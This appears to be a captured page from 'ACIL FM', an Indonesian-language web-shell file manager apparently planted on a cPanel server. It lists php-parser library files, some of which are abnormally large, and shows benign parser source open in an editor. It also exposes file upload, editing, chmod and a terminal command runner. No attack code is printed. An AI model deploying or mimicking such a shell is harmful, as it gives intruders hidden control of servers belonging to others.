ACIL FM
Dark
Refresh
Current DIR:
/opt/cpanel/ea-wappspector/vendor/nikic/php-parser/lib/PhpParser/Node/Scalar
/
opt
cpanel
ea-wappspector
vendor
nikic
php-parser
lib
PhpParser
Node
Scalar
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
MagicConst
-
chmod
Open
Rename
Delete
DNumber.php
284 B
chmod
View
DL
Edit
Rename
Delete
Encapsed.php
321 B
chmod
View
DL
Edit
Rename
Delete
EncapsedStringPart.php
383 B
chmod
View
DL
Edit
Rename
Delete
Float_.php
2.05 MB
chmod
View
DL
Edit
Rename
Delete
InterpolatedString.php
933 B
chmod
View
DL
Edit
Rename
Delete
Int_.php
2.45 MB
chmod
View
DL
Edit
Rename
Delete
LNumber.php
278 B
chmod
View
DL
Edit
Rename
Delete
MagicConst.php
602 B
chmod
View
DL
Edit
Rename
Delete
String_.php
4.96 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/cpanel/ea-wappspector/vendor/nikic/php-parser/lib/PhpParser/Node/Scalar/InterpolatedString.php
<?php declare(strict_types=1); namespace PhpParser\Node\Scalar; use PhpParser\Node\Expr; use PhpParser\Node\InterpolatedStringPart; use PhpParser\Node\Scalar; class InterpolatedString extends Scalar { /** @var (Expr|InterpolatedStringPart)[] list of string parts */ public array $parts; /** * Constructs an interpolated string node. * * @param (Expr|InterpolatedStringPart)[] $parts Interpolated string parts * @param array<string, mixed> $attributes Additional attributes */ public function __construct(array $parts, array $attributes = []) { $this->attributes = $attributes; $this->parts = $parts; } public function getSubNodeNames(): array { return ['parts']; } public function getType(): string { return 'Scalar_InterpolatedString'; } } // @deprecated compatibility alias class_alias(InterpolatedString::class, Encapsed::class);
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply